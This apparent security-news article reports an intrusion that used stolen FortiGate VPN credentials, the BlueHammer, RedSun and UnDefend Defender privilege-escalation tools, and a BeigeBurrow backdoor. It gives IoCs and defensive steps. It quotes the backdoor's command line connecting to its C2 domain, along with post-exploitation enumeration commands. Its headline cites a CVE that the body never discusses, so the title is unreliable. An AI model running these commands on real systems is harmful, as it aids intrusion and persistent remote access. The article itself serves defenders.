Critical FortiGate SSL VPN Vulnerability (CVE-2022-42475) Exploited in Attacks
Key Takeaways A recent intrusion campaign exploited a compromised FortiGate SSL VPN to gain initial access to an enterprise network. Attackers then attempted to deploy a suite of publicly available...
Key Takeaways
- A recent intrusion campaign exploited a compromised FortiGate SSL VPN to gain initial access to an enterprise network.
- Attackers then attempted to deploy a suite of publicly available Windows privilege escalation tools, BlueHammer, RedSun, and UnDefend, developed by researcher Chaotic Eclipse.
- While the privilege escalation attempts largely failed, the incident marks the first observed in-the-wild use of these specific tools.
- A custom Go-compiled backdoor, BeigeBurrow, successfully established persistent command-and-control communication.
- Organizations are urged to patch CVE-2026-33825, review VPN logs for suspicious activity, and hunt for indicators of compromise.
Cybersecurity researchers have uncovered an active intrusion campaign that leveraged initial access through a compromised FortiGate SSL VPN, subsequently deploying a novel set of privilege escalation tools known as Nightmare-Eclipse. This incident represents the first documented real-world exploitation of these particular tools against a live enterprise environment, signaling an urgent threat to organizations globally.
Table Of Content
The tools at the core of this attack—BlueHammer, RedSun, and UnDefend—were created by a security researcher operating under the pseudonym Chaotic Eclipse (also known as Nightmare-Eclipse). This individual publicly released a series of local privilege escalation (LPE) exploits, reportedly out of frustration with Microsoft’s vulnerability disclosure procedures.
These three tools exploit logical flaws within Windows Defender’s privileged operations. Their aim is to either elevate an attacker’s privileges from a standard user account to SYSTEM-level access or to entirely disable Defender’s security functions, all without requiring administrative rights. While Microsoft addressed the BlueHammer vulnerability (CVE-2026-33825) in its April 2026 Patch Tuesday updates, both RedSun and UnDefend remain unpatched zero-day exploits, posing a continued risk to even fully updated Windows systems.
Nightmare-Eclipse Tools Deployed via FortiGate SSL VPN Access
Security firm Huntress first identified suspected in-the-wild activity involving BlueHammer on April 10, 2026. Investigators observed a binary named FunnyApp.exe—an exact build from the public BlueHammer GitHub repository—being executed from a victim user’s Pictures folder. Windows Defender subsequently quarantined the file, identifying it as Exploit:Win32/DfndrPEBluHmr.BZ.
The campaign intensified by April 16, with researchers documenting the execution of RedSun.exe from a user’s Downloads directory. Concurrently, multiple instances of undef.exe, the UnDefend binary, were launched from two-letter subfolders such as ks and kk. Interestingly, the threat actor displayed a lack of proficiency, invoking UnDefend with a misspelled -agressive flag and a non-functional -h help flag, suggesting an incomplete understanding of the tool’s usage.
Crucially, none of the observed privilege escalation attempts proved successful. BlueHammer failed to extract SAM credentials, RedSun was unable to overwrite TieringEngineService.exe in System32, and Huntress’ Security Operations Center (SOC) intervened to terminate UnDefend during active remediation efforts.
A critical breakthrough in understanding the intrusion came from customer-provided VPN logs. On April 15, 2026, at 13:44 UTC, an attacker initiated an SSL VPN connection to the victim’s FortiGate firewall. This connection utilized valid user credentials and originated from IP address 78.29.48[.]29, geolocated to Russia. Subsequent unauthorized sessions linked to the same compromised account were detected from 212.232.23[.]69 (Singapore) and 179.43.140[.]214 (Switzerland), a multi-geographic access pattern indicative of credential abuse, potentially involving credential resale or sharing.
The most dangerous element identified by Huntress was a Go-compiled Windows binary dubbed BeigeBurrow. This tool executed as agent.exe -server staybud.dpdns[.]org:443 -hide. BeigeBurrow leverages HashiCorp’s Yamux multiplexing library to establish a persistent, stealthy TCP relay between the compromised host and attacker-controlled infrastructure over port 443, a port commonly left open by enterprise firewalls. Unlike the privilege escalation tools, BeigeBurrow successfully established its outbound connection, making it the only component in the observed toolkit to achieve its intended purpose. Huntress noted that it has encountered BeigeBurrow in at least one other unrelated intrusion, though definitive attribution remains elusive.
Beyond the automated tool execution, Huntress confirmed the presence of a live, “hands-on-keyboard” threat actor through the execution of various post-exploitation enumeration commands, including whoami /priv, cmdkey /list, and net group. Notably, the whoami /priv command was spawned directly from an M365Copilot.exe process, an unusual anomaly that investigators could not fully explain but observed occurring after the initial compromise and following the initial BlueHammer execution attempt.
Indicators of Compromise (IoCs)
| Indicator | Type | Description |
|---|---|---|
78.29.48[.]29 |
IP | SSL VPN source, Russia |
212.232.23[.]69 |
IP | SSL VPN source, Singapore |
179.43.140[.]214 |
IP | SSL VPN source, Switzerland |
staybud.dpdns[.]org |
Domain | BeigeBurrow C2 server |
FunnyApp.exe, RedSun.exe, undef.exe, z.exe |
File | Nightmare-Eclipse binaries |
Exploit:Win32/DfndrPEBluHmr.BZ |
Defender Alert | BlueHammer detection signature |
a2b6c7a9...e2876b7c |
SHA-256 | BeigeBurrow agent.exe hash |
What You Should Do
Organizations should consider any confirmed execution of these binaries as a high-priority incident. Huntress recommends the following immediate actions for defenders:
- Apply Patches Immediately: Ensure that Microsoft’s April 2026 Patch Tuesday update is applied across all relevant systems to remediate CVE-2026-33825 (BlueHammer).
- Hunt for Staging Artifacts: Proactively investigate user-writable paths, particularly
Picturesand short subfolders withinDownloads, for the presence of binaries such asFunnyApp.exe,RedSun.exe,undef.exe, andz.exe. - Review VPN Authentication Logs: Scrutinize VPN authentication logs for any user accounts authenticating from multiple disparate geographic locations within a condensed timeframe, which may indicate credential compromise.
- Block and Monitor Tunneling Behavior: Investigate any execution of
agent.exeusing the-serverand-hideflags, and immediately block the domainstaybud.dpdns[.]orgat network perimeters. - Detect Post-Exploitation Enumeration: Configure alerts for the execution of common post-exploitation commands like
whoami /priv,cmdkey /list, andnet group, especially when spawned from unusual or unexpected parent processes.
A YARA detection rule for BeigeBurrow has been made publicly available to assist in community-wide detection efforts.
Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.



No Comment! Be the first one.